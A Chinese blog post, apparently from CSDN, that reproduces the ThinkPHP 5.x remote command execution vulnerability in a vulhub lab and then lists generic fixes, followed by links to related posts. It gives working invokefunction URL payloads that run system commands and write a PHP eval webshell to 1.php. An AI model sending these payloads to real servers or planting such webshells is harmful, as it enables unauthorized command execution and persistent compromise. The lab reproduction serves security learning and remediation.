Thinkphp框架漏洞(附修复方法)

于 2024-08-07 14:31:42 发布
阅读量599 收藏 8
点赞数 3
文章标签: web安全 安全 服务器 框架漏洞 thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C233333235/article/details/140989669
版权

      ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式

      ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。TP(2-6)(5-目前使用率较高的)

Thinkphp5x远程命令执行及getshell

漏洞复现

首先我们搭建一个漏洞环境,搭建命令如下

cd vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

进入环境后,我们来到这样一个页面

直接在ip和端口后面拼接一段url如下

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

点击回车后即可看到我们输入的命令(whoami)的执行结果,说明这个页面存在远程命令执行漏洞

然后我们将url中的system替换为phpinfo,whoami替换为-1,则会显示出phpinfo();的执行结果,这说明这个页面也存在远程代码执行漏洞

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

最后,我们尝试获取shell,利用他的远程命令执行漏洞,输出一个一句话木马到1.php文件中,构造url如下,其中$_POST前加反斜杠是因为该网站会对其进行转义,\可以防止被转义

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST['cmd']); ?>" >> 1.php

运行成功后直接在IP后面加上/1.php访问,成功后用蚁剑连接

修复方法

1.对于用户提交的数据,尤其是命令执行相关的数据,一定要进行严格的验证和过滤。例如,您可以使用正则表达式或预定义的白名单来限制可以接受的命令。

2.部署一个 Web 应用防火墙可以帮助阻止恶意请求到达您的应用程序。WAF 可以检测并阻止潜在的攻击尝试。

3.进行代码审计,查找潜在的安全漏洞。确保遵循最佳实践,例如使用预编译语句防止 SQL 注入,使用 HTTPS 加密通信等。

4.确保您的服务器操作系统和其他相关软件(如 PHP、Apache/Nginx)都是最新版本,并安装了所有必要的安全补丁。

5.启用日志记录以监控异常行为,并定期审查日志文件以查找潜在的攻击迹象。

Atopos`
关注
php安全漏洞怎么修复,thinkphp漏洞如何修复
weixin_42138788的博客
03-16 1091
THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查询系统的漏洞都进行了修复,官方本以为没有问题了,但是在实际的安全检测当中发现,还是存在问题,还是可以远程代码进行注入,插入非法字符,提交到服务器后端中去。关于这次发现的oday漏洞,我们来看下是怎么样...
Thinkphp5安全漏洞修复方法5.0,5.1)
weixin_42476734的博客
01-10 5834
安全漏洞更新方法: 1、使用composer或者git直接更新 2、在thinkphp/library/think/文件下找到App.php,如下图 查找module方法, 找到获取控制器名 在这句话下面添加一段代码 if (!preg_match(’/1(\w|.)*$/’, $controller)) { throw new HttpException(404, ‘controller n...
ThinkPHP 5.x 远程命令执行漏洞修复
abm1314的博客
12-20 214
https://laravel-china.org/articles/21227 转载于:https://www.cnblogs.com/Yirson/p/10150867.html
thinkphp5.0漏洞修复
心学的博客
09-07 1483
thinkphp5.0漏洞修复
thinkPHP5.0漏洞修复
qq_37456982的博客
05-07 800
1、在thinkphp/library/think/文件下找到App.php, 搜索// 获取控制器名 $controller = strip_tags($result[1] ?: $config['default_controller']); $controller = $convert ? strtolower($controller) : $controller; //添加...
Thinkphp漏洞修复指南
berlinchans的博客
03-01 705
一.远程漏洞执行漏洞1 标题: ThinkPHP5 <= 5.0.22 远程代码执行高危漏洞修复 5.0版本 在think\App类的module方法的获取控制器的代码后面加上 if (!preg_match(‘/^A-Za-z*$/‘, $controller)) { throw new HttpException(404, ‘controller not exists:’ . ...
php tp框架的特性,ThinkPHP框架特性引发的SQL注入漏洞
weixin_32042443的博客
03-25 318
### 简要描述:ThinkPHP框架本身缺陷导致SQL注入漏洞,基本影响所有使用ThinkPHP开发的应用,包括thinksns、onethink等### 详细说明:关键代码在`\ThinkPHP\Library\Think\Db\Driver.class.php`,683行。```/*** order分析* @access protected* @param mixed $order* @re...
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
修复漏洞方法主要是通过下载官方发布的补丁或者直接修改源码的方式。官方补丁通常会在发现问题后迅速发布,开发者需要关注官方的更新日志,及时下载并更新到最新版本以修复已知的安全漏洞。此外,如果官方补丁还...
thinkphp漏洞检测工具
06-06
4. **漏洞修复**:针对检测出的漏洞,开发者需要根据报告提供的信息,对代码进行修正,确保消除安全隐患。这可能涉及更新框架版本、修复代码逻辑错误或加强输入验证等操作。 除了Aazhen-RexHa,还有其他一些常用的...
thinkphp 一键漏洞检测
12-09
这表明它具有广泛的适用性,能够帮助管理员或开发者快速检测并修复不同版本ThinkPHP框架安全问题。 在网络安全中,漏洞检测是至关重要的一步。通过自动化的漏洞扫描,可以发现潜在的安全弱点,例如SQL注入、XSS跨...
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
ThinkPHP漏洞怎么解决
最新发布
2401_85777843的博客
07-11 327
我意识到,作为一名开发者,我们不仅要关注功能的实现,更要关注代码的安全性。但我没有放弃,而是继续查阅资料,向有经验的同事请教,努力找到解决问题的办法。记得那天,我收到了一封来自安全团队的邮件,邮件里提到我们的网站可能存在ThinkPHP框架漏洞。我首先去查阅了ThinkPHP的官方文档和社区论坛,了解这个漏洞的详细情况和可能的影响。我相信,在未来的工作中,我会更加注重代码的安全性,为用户带来更好的体验。说实话,面对漏洞,我刚开始是有点慌的。经过几天的努力,我终于修复了所有的漏洞,并进行了全面的测试。
ThinkPHP远程执行漏洞修复方案探讨
Li91314的博客
07-11 597
通过及时更新框架版本、加强用户输入验证、限制文件包含和动态执行功能、使用安全加固工具以及加强安全意识培训等措施,我们可以有效地修复和防范ThinkPHP远程执行漏洞,提高Web应用的安全性。具体来说,当框架接收到用户提交的请求时,如果没有对用户输入进行严格的验证和过滤,就可能导致恶意代码的执行。这就导致了一个问题,框架中的一些功能设计也可能存在安全隐患,如文件包含、动态执行等,这些功能如果被攻击者利用,也可能导致远程执行漏洞的产生。近年来,ThinkPHP框架中出现的远程执行漏洞成为了开发者们关注的焦点。
eclipse的servlet默认不执行index_ThinkPHP 5.x远程命令执行漏洞复现
weixin_39881802的博客
11-21 104
一、漏洞描述2018年12月10日,ThinkPHP官方发布了安全更新,其中修复ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。二、漏洞影响版本Thinkphp 5.x-Thinkphp 5.1....
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2485
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1387
Thinkphp漏洞复现
thinkphp 需要注意的一些漏洞(可能已经修复,此处仅是学习)
houzhyan-博客
04-11 3663
部分内容摘自网络。看完之后受益匪浅,和大家分享 之前发过关于thinkphp的一个ip获取漏洞,官方木有反应 http://www.thinkphp.cn/bug/2756.html 于是就考虑到官方的关于web中的sql注入过滤的问题是否也是非常马虎。 看来几篇文章,发现确实这个thinkphp 框架写的不怎么样。对于安全问题视而不见。以下部分内容摘自网络以及本人测试 测试:下载thi
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1995
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值